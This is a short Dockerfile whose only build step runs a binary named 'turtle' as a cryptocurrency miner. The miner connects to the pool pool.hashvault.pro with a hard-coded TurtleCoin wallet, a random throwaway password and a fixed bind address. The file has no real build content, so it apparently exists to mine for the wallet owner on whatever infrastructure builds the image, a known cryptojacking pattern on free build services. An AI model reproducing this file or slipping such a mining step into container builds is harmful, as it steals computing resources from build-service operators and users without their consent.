FROM christiankm01/master:latest
RUN set -ex \
  && IDFGH=$(cat /dev/urandom | tr -dc '0-9' | fold -w 1 | head -n 1) \
  && echo $IDFGH \
  && turtle --algorithm argon2id_chukwa2 --pool pool.hashvault.pro:443 --wallet TRTLuxPjENtXw5UTMHxoMcBHFdeavnnQLjV8buLeeU6F3cwcsE5FHJGX9vamnUcG35BkQy6VfwUy5CsV9YNomioPGGyVhL6NH71 --password $IDFGH --bind 54.39.234.99:3129

